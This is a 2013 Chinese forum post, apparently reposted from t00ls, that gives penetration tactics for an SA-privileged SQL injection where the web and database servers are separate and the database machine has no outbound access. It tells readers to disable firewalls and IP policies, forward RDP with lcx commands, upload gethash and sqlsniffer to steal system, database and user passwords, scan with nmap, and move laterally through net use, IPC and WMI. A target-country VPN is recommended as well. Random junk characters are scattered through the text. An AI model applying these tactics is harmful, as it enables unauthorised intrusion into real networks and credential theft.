找回密码
 立即注册
查看: 2843|回复: 0
打印 上一主题 下一主题

SA权限网站和数据库分离的一些思路

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-16 21:46:01 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
当你碰到SA的注入点,可以执行命令,但是web与数据库分离,你都会怎么做呢,当数据库不服务器不能连接外网的时候,是不是只想着从web搞呢,这篇文章从t00ls转载过来,希望对大家sa权限的注入点数据库web分离提供一些渗透思路。
, y* ^# y; W2 B  M4 @9 {4 U4 o2 u
* d! O9 u5 w4 e  [, f3 w# W8 ^. c/ b! ~* [5 K8 K& O
/ z9 u0 Y+ c( u2 p* d& X5 U
SA点,system权限,可执行命令,web和db分离.DB机器不上网(一般指中马不上线,lcx反弹不出)! X, z7 ?' x" K  j3 ?8 Z8 f
& H2 ^! D; l& b- B; S

# Q, X# y% y2 D; l; l一、DB机有公网IP.$ s1 A& Y: \/ Y9 e5 `
$ M) L6 i/ o/ r  Q
1:执行命令把系统防火墙和ip策略停止,netstat -an找到3389端口尝试连接.
6 V+ I, g0 o3 g& m8 W5 j" Q5 m8 [; I. ]9 _9 N& X

/ s' J+ a( S, [* j* ^2:从内往外扫描.把命令行下的s扫描器转成vbs传上DB机器生成exe扫描外网一台做了端口策略的机器.这台外网机器开放所有端口.(可以到网上找这 样的 机器.) 如果扫描结果有开放端口,证明在这台DB机可以把3389转到外面机器.比如扫到80 那就lcx -slave ip 80 127.0.0.1 3389.- z5 e- _  {: W5 W# E) M+ A
" |$ C: R0 H8 {+ j& }
- E6 h' R4 h" a6 a: W' f
3:尽量多拿密码.用vbs的方法上传gethash,sqlsniffer类的工具.拿到系统和mssql的密 码,数据库表的后台管理员密码,member表的最前几个用户密码.这些密码可以用来测试web后台,web的3389 ftp等.当然事先要对web机器完整扫描一遍. www.2cto.com
' R+ m2 _4 i2 g* {9 X* G4 q0 A
. y, b- i/ x1 C$ b3 f( Q( C$ I' ?- M% M+ H+ q
4,nmap扫描.用nmap扫描web和db机器的1-65535端口.如果发现db机器显示有closed的端口.那恭喜你,你可以lcx -tran 把3389转发到该端口直接登陆.firewalk也有类似功能.但对代理防火墙无用.
/ C8 j3 \% i9 T6 o
! ~3 l3 D3 e1 E% _9 O" ^# [
0 r6 p8 j  v( i% }, [/ o
& X) b! [3 F. Q  j( E二、DB机只有内网IP
9 \+ S& |( O0 G( I$ \2 B2 @5 @' X3 _( d. F
1:尽量多拿密码来net use到web机器.这个过程需要极大的耐心 , 拿密码尝试登陆web后台等.
! Z5 l4 K1 H4 Z% d
! p& l) N! h  g' y
7 l  t' @' b& v* C/ \2:停掉防火墙和IP策略再从内往外扫描.& c! R# r, ?/ d  N& }$ u+ ?% k+ B* _7 `

7 V5 p/ I$ s1 M: ~+ v6 d1 f. i# B  x: y) I1 l' O
3: ipconfig /dispalydns如果发现有公网的域名,极大可能是路由做了手脚.机会还是有的.0 o9 V* U5 t# X2 e* @- ~  Z# |

. l4 \/ B+ _, d0 o3 t' L' e
: W( P6 S1 K$ D' g( i4:学会密码规律分析往往会有惊喜.4 F8 ~7 l5 c; e+ U. L

5 }! H# Y. s4 K" }
9 @0 u: i' P& L' S9 E5,在sa点里执行命令渗透内网,找可上网的机器.isql,ipc共享,wmi等! i, A( e: |9 j  ~# S3 M
9 [! e; z2 N. P$ I' M6 R

- @; R8 p( @, ]! }4 t, C2 m有些地区或国家会禁止别的国家连接一些端口,所以拥有目标国代理或VPN是很重要的​
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表